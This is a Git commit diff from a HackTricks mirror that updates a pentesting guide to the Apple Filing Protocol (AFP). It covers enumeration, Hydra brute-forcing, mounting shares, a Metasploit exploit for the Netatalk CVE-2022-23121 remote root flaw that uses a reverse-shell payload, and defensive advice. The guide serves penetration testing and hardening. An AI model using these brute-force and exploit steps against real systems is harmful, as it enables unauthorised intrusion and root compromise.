maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1269 from HackTricks-wiki/research_update_src_network-services-pentesting_584-pentesting-afp_20250810_162156

Browse Source 
Research Update Enhanced src/network-services-pentesting/584...
This commit is contained in:
SirBroccoli 2025-08-14 04:34:24 +02:00 committed by GitHub
commit bd6e2ddb10
1 changed files with 104 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
src/network-services-pentesting/584-pentesting-afp.md
View File

@ -4,34 +4,121 @@
## Basic Information
The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within the **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and sophisticated file locking mechanisms. It was the main protocol for file services in Mac OS 9 and earlier versions.
The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms.
**Default Port:** 548
Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in:
* Legacy macOS / Mac OS 9 environments
* NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon
* Mixed-OS networks where Time-Machine-over-AFP is still enabled
**Default TCP Port:** **548** (AFP over TCP / DSI)
```bash
PORT STATE SERVICE
548/tcp open afp
PORT STATE SERVICE
548/tcp open afp
```
### **Enumeration**
---
For the enumeration of AFP services, the following commands and scripts are useful:
## Enumeration
### Quick banner / server info
```bash
msf> use auxiliary/scanner/afp/afp_server_info
nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
# Metasploit auxiliary
use auxiliary/scanner/afp/afp_server_info
run RHOSTS=<IP>
# Nmap NSE
nmap -p 548 -sV --script "afp-* and not dos" <IP>
```
**Scripts and Their Descriptions:**
Useful AFP NSE scripts:
- **afp-ls**: This script is utilized to list the available AFP volumes and files.
- **afp-path-vuln**: It lists all AFP volumes and files, highlighting potential vulnerabilities.
- **afp-serverinfo**: This provides detailed information about the AFP server.
- **afp-showmount**: It lists available AFP shares along with their respective ACLs.
| Script | What it does |
|--------|--------------|
| **afp-ls** | List available AFP volumes and files |
| **afp-brute** | Password brute-force against AFP login |
| **afp-serverinfo** | Dump server name, machine type, AFP version, supported UAMs, etc. |
| **afp-showmount** | List shares together with their ACLs |
| **afp-path-vuln** | Detects (and can exploit) directory-traversal, CVE-2010-0533 |
### [**Brute Force**](../generic-hacking/brute-force.md#afp)
The NSE brute-force script can be combined with Hydra/Medusa if more control is required:
```bash
hydra -L users.txt -P passwords.txt afp://<IP>
```
### Interacting with shares
*macOS*
```bash
# Finder → Go → "Connect to Server…"
# or from terminal
mkdir /Volumes/afp
mount_afp afp://USER:[email protected]/SHARE /Volumes/afp
```
*Linux* (using `afpfs-ng` packaged in most distros)
```bash
apt install afpfs-ng
mkdir /mnt/afp
mount_afp afp://USER:[email protected]/SHARE /mnt/afp
# or interactive client
afp_client <IP>
```
Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files these often hold interesting metadata that DFIR tools miss.
---
## Common Vulnerabilities & Exploitation
### Netatalk unauthenticated RCE chain (2022)
Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available.
Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`.
```bash
use exploit/linux/netatalk/parse_entries
set RHOSTS <IP>
set TARGET 0 # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
run
```
If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**.
### Netatalk OpenSession heap overflow (2018)
Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research.
### Other notable issues
* **CVE-2022-22995** Symlink redirection leading to arbitrary file write / RCE when AppleDouble v2 is enabled (3.1.0 - 3.1.17).
* **CVE-2010-0533** Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`).
* Multiple memory-safety bugs were fixed in **Netatalk 4.x (2024)** recommend upgrading rather than patching individual CVEs.
---
## Defensive Recommendations
1. **Disable AFP** unless strictly required use SMB3 or NFS instead.
2. If AFP must stay, **upgrade Netatalk to ≥ 3.1.18 or 4.x**, or apply vendor firmware that back-ports the 2022/2023/2024 patches.
3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins.
4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely.
5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances.
---
### [Brute-Force](../generic-hacking/brute-force.md#afp)
## References
* Netatalk Security Advisory CVE-2022-23121 "Arbitrary code execution in parse_entries" <https://netatalk.io/security/CVE-2022-23121>
* Tenable Research "Exploiting an 18-Year-Old Bug (CVE-2018-1160)" <https://medium.com/tenable-techblog/exploiting-an-18-year-old-bug-b47afe54172>
{{#include ../banners/hacktricks-training.md}}